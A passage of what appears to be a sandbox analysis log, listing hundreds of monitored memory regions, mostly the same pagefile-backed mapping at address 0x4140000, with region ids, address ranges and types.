"pagefile_0x0000000004140000" filename = "" Region: id = 10800 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10801 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10802 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10803 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10804 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10805 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10806 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10807 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10808 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10809 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10810 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10811 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10812 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10813 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10814 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10815 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10816 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10817 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10818 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10819 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10820 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10821 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10822 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10823 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10824 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10825 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10826 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10827 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10828 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10829 start_va = 0x4150000 end_va = 0x4150fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004150000" filename = "" Region: id = 10830 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10831 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10832 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10833 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10834 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10835 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10836 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10837 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10838 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10839 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10840 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10841 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10842 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10843 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10844 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10845 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10846 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10847 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10848 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10849 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10850 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10851 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10852 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10853 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10854 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10855 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10856 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10857 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10858 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10859 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10860 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10861 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10862 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10863 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10864 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10865 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10866 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10867 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10868 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10869 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10870 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10871 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10872 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10873 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10874 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10875 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10876 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10877 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10878 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10879 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10880 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10881 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10882 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10883 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10884 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10885 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10886 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10887 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10888 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10889 start_va = 0x4140000 end_va = 0x4140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10890 start_va = 0x4140000 end_va = 0x414ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 10891 start_va = 0x4140000 end_va = 0x415dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 10892 start_va = 0x41d0000 end_va = 0x41defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041d0000" filename = "" Region: id = 10893 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10894 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10895 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10896 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10897 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10898 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10899 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10900 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10901 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10902 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10903 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10904 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10905 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10906 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10907 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10908 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10909 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10910 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10911 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10912 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10913 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10914 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10915 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10916 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10917 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10918 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10919 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10920 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10921 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10922 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10923 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10924 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10925 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10926 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10927 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10928 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10929 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10930 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10931 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10932 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10933 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10934 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10935 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10936 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10937 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10938 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10939 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10940 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10941 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10942 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10943 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10944 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10945 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10946 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10947 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10948 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10949 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10950 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10951 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10952 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10953 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10954 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10955 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10956 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10957 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10958 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10959 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10960 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10961 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10962 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10963 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10964 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10965 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10966 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10967 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10968 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10969 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10970 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10971 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10972 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10973 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10974 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10975 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10976 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10977 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10978 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10979 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10980 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10981 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10982 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10983 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10984 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10985 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10986 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10987 start_va = 0x4140000 end_va = 0x414efff 